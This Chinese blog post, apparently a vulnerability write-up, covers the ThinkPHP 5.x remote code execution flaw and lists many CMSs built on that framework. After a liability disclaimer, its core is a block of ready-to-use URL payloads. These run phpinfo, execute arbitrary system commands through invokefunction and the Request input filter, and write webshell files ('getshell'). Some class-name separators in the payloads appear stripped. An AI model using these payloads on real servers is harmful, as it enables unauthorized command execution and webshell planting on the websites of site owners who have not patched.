免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
影响范围
- 5.x < 5.1.31
- 5.x <= 5.0.23
以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响,建议厂商及时更新。AdminLTE后台管理系统
- layui后台管理系统
- thinkcmf
- H-ui.admin后台管理系统
- tpshop
- FsatAdmin
- eyoucms
- LarryCMS后台管理系统
- tpadmin后台管理系统
- snake后台管理系统
- ThinkSNS
- DolphinPHP后台管理系统
- WeMall商城系统
- CLTPHP
- 齐博CMS
- DSMALL
- YFCMF
- HisiPHP后台管理系统
- Tplay后台管理系统
- lyadmin后台管理系统
- haoid后台管理系统
漏洞验证
命令执行getshell
测试代码
#代码执行?s=index/thinkRequest/input&filter=phpinfo&data=1#命令执行?s=index/thinkRequest/input&filter=system&data=系统命令
#getshell?s=index/thinktemplatedriverfile/write&cacheFile=paylog.php&content=hacker#getshell2?
s=index/thinkviewdriverPhp/display&content=#代码执行?
s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1#命令执行?
s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令#代码执行?
s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1#命令执行?
s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令
感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
THE END
暂无评论内容